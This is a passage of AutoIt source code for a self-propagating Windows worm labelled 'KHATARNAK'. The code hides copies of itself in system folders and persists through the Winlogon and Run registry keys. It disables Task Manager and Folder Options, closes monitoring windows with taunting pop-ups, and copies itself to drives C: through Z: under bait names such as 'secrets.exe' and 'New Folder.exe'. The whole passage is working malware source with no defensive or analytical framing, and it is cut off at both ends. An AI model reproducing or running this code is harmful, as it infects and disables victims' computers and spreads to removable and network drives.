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- #NoTrayIcon
- $EXE = ".exe"
- $VIRUS = @WindowsDir & "\" & $NAME & $EXE
- For $NOTHING = 0 To 1 Step 0
- If ProcessExists($NAME & $EXE) Then
- If @AutoItExe = $NAME & $EXE Then
- EndIf
- ElseIf Not ProcessExists($NAME & $EXE) Then
- FileCopy(@AutoItExe, @SystemDir & "\" & $NAME & $EXE, 0)
- FileSetAttrib(@SystemDir & "\" & $NAME & $EXE, "+RSH")
- FileCopy(@AutoItExe, @WindowsDir & "\" & $NAME & $EXE, 0)
- FileSetAttrib(@WindowsDir & "\" & $NAME & $EXE, "-RSH")
- Sleep(1000)
- Run(@SystemDir & "\" & $NAME & $EXE)
- Exit (0)
- EndIf
- Sleep(1000)
- RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", "Explorer.exe " & $NAME & $EXE)
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "KHATARNAK Loader", "REG_SZ", @SystemDir & "\" & $NAME & $EXE)
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NofolderOptions", "REG_DWORD", 1)
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", 1)
- Sleep(1000)
- Opt("WinTitleMatchMode", 2)
- If WinExists("Task Manager") Then
- WinClose("Task Manager")
- MsgBox(16, "Message for " & @UserName, "MUHAHAHAHAHA!!!!!!", 10)
- EndIf
- If WinExists("Registry") Then
- WinClose("Registry")
- MsgBox(16, "Message for " & @UserName, "Edit your registry later you FOOL", 10)
- EndIf
- If WinExists("SEX") Then
- WinClose("SEX")
- MsgBox(16, "Message for " & @UserName, "Browse somewhere else you FOOL!!!", 10)
- EndIf
- If WinExists("Sex") Then
- WinClose("Sex")
- MsgBox(16, "Message for " & @UserName, "Browse somewhere else you FOOL!!!", 10)
- EndIf
- If WinExists("sex") Then
- WinClose("sex")
- MsgBox(16, "Message for " & @UserName, "Browse somewhere else you FOOL!!!", 10)
- EndIf
- If WinExists("PORN") Then
- WinClose("PORN")
- MsgBox(16, "Message for " & @UserName, "Browse somewhere else you FOOL!!!", 10)
- EndIf
- If WinExists("Porn") Then
- WinClose("Porn")
- MsgBox(16, "Message for " & @UserName, "Browse somewhere else you FOOL!!!", 10)
- EndIf
- If WinExists("porn") Then
- WinClose("porn")
- MsgBox(16, "Message for " & @UserName, "Browse somewhere else you FOOL!!!", 10)
- EndIf
- If WinExists("FUCK") Then
- WinClose("FUCK")
- MsgBox(16, "Message for " & @UserName, "Browse somewhere else you FOOL!!!", 10)
- EndIf
- If WinExists("Fuck") Then
- WinClose("Fuck")
- MsgBox(16, "Message for " & @UserName, "Browse somewhere else you FOOL!!!", 10)
- EndIf
- If WinExists("fuck") Then
- WinClose("fuck")
- MsgBox(16, "Message for " & @UserName, "Browse somewhere else you FOOL!!!", 10)
- EndIf
- Sleep(1000)
- FileCopy($VIRUS, "C:\Pictures.exe")
- FileCopy($VIRUS, "C:\Songs.exe")
- FileCopy($VIRUS, "C:\Documents and Settings.exe")
- FileCopy($VIRUS, "C:\New Folder.exe")
- FileCopy($VIRUS, "C:\New Folder(2).exe")
- FileCopy($VIRUS, "C:\WINDOWS.exe")
- FileCopy($VIRUS, "C:\files.exe")
- FileCopy($VIRUS, "C:\Program Files.exe")
- Sleep(1000)
- FileCopy($VIRUS, "D:\Games.exe")
- FileCopy($VIRUS, "D:\New Folder.exe")
- FileCopy($VIRUS, "D:\New Folder(2).exe")
- FileCopy($VIRUS, "D:\Cool Stuff.exe")
- FileCopy($VIRUS, "D:\Secrets(2).exe")
- FileCopy($VIRUS, "D:\Jokes(2).exe")
- FileCopy($VIRUS, "D:\Songs.exe")
- FileCopy($VIRUS, "D:\New Folder(3).exe")
- Sleep(1000)
- FileCopy($VIRUS, "E:\file.exe")
- FileCopy($VIRUS, "E:\secrets.exe")
- FileCopy($VIRUS, "E:\pics.exe")
- FileCopy($VIRUS, "E:\latest songs.exe")
- FileCopy($VIRUS, "E:\adventure games.exe")
- FileCopy($VIRUS, "E:\softwares.exe")
- FileCopy($VIRUS, "E:\documents.exe")
- FileCopy($VIRUS, "E:\New Folder.exe")
- FileCopy($VIRUS, "E:\New Folder(2).exe")
- FileCopy($VIRUS, "E:\New folder(3).exe")
- FileCopy($VIRUS, "E:\New Folder(9).exe")
- Sleep(1000)
- FileCopy($VIRUS, "F:\secrets.exe")
- FileCopy($VIRUS, "F:\Fun.exe")
- FileCopy($VIRUS, "F:\New Folder(5).exe")
- Sleep(1000)
- FileCopy($VIRUS, "G:\New Folder(8).exe")
- FileCopy($VIRUS, "G:\secrets.exe")
- FileCopy($VIRUS, "G:\pics.exe")
- FileCopy($VIRUS, "G:\latest songs.exe")
- FileCopy($VIRUS, "G:\adventure games.exe")
- FileCopy($VIRUS, "G:\softwares.exe")
- FileCopy($VIRUS, "G:\documents.exe")
- FileCopy($VIRUS, "G:\New Folder.exe")
- FileCopy($VIRUS, "G:\New Folder(2).exe")
- FileCopy($VIRUS, "G:\New folder(3).exe")
- FileCopy($VIRUS, "G:\New Folder(9).exe")
- Sleep(1000)
- FileCopy($VIRUS, "H:\New Folder(4).exe")
- FileCopy($VIRUS, "H:\New Folder(8).exe")
- FileCopy($VIRUS, "H:\secrets.exe")
- FileCopy($VIRUS, "H:\pics.exe")
- FileCopy($VIRUS, "H:\latest songs.exe")
- FileCopy($VIRUS, "H:\adventure games.exe")
- FileCopy($VIRUS, "H:\softwares.exe")
- FileCopy($VIRUS, "H:\documents.exe")
- FileCopy($VIRUS, "H:\New Folder.exe")
- FileCopy($VIRUS, "H:\New Folder(2).exe")
- FileCopy($VIRUS, "H:\New folder(3).exe")
- FileCopy($VIRUS, "H:\New Folder(9).exe")
- Sleep(1000)
- FileCopy($VIRUS, "I:\New Folder(2).exe")
- FileCopy($VIRUS, "I:\New Folder.exe")
- FileCopy($VIRUS, "J:\New Folder(6).exe")
- FileCopy($VIRUS, "J:\New Folder.exe")
- FileCopy($VIRUS, "K:\New Folder (2).exe")
- FileCopy($VIRUS, "K:\New Folder.exe")
- FileCopy($VIRUS, "L:\files.exe")
- FileCopy($VIRUS, "L:\New Folder.exe")
- FileCopy($VIRUS, "M:\files.exe")
- FileCopy($VIRUS, "M:\New Folder.exe")
- FileCopy($VIRUS, "N:\files.exe")
- FileCopy($VIRUS, "N:\New Folder.exe")
- FileCopy($VIRUS, "O:\files.exe")
- FileCopy($VIRUS, "O:\New Folder.exe")
- FileCopy($VIRUS, "P:\files.exe")
- FileCopy($VIRUS, "P:\New Folder.exe")
- FileCopy($VIRUS, "Q:\files.exe")
- FileCopy($VIRUS, "Q:\New Folder.exe")
- FileCopy($VIRUS, "R:\files.exe")
- FileCopy($VIRUS, "R:\New Folder.exe")
- FileCopy($VIRUS, "S:\files.exe")
- FileCopy($VIRUS, "S:\New Folder.exe")
- FileCopy($VIRUS, "T:\files.exe")
- FileCopy($VIRUS, "T:\New Folder.exe")
- FileCopy($VIRUS, "U:\files.exe")
- FileCopy($VIRUS, "U:\New Folder.exe")
- FileCopy($VIRUS, "V:\files.exe")
- FileCopy($VIRUS, "V:\New Folder.exe")
- FileCopy($VIRUS, "W:\files.exe")
- FileCopy($VIRUS, "W:\New Folder.exe")
- FileCopy($VIRUS, "X:\files.exe")
- FileCopy($VIRUS, "X:\New Folder.exe")
- FileCopy($VIRUS, "Y:\files.exe")
- FileCopy($VIRUS, "Y:\New Folder.exe")
- FileCopy($VIRUS, "Z:\files.exe")
- FileCopy($VIRUS, "Z:\New Folder.exe")
- Sleep(1000)
- FileCopy($VIRUS, "B:\New Folder.exe")
- FileCopy($VIRUS, "B:\New Folder.exe")
- Sleep(1000)
- HotKeySet("+!{PAUSE}", "Terminate")
- Next
- MsgBox(64, "Message", "KHATARNAK will be Terminated", 5)
- RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
- MsgBox(64, "Message", "Task Manager enabled!", 5)
- RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NofolderOptions")
- MsgBox(64, "Message", "Folder options enabled!", 5)
- Exit (0)
- EndFunc
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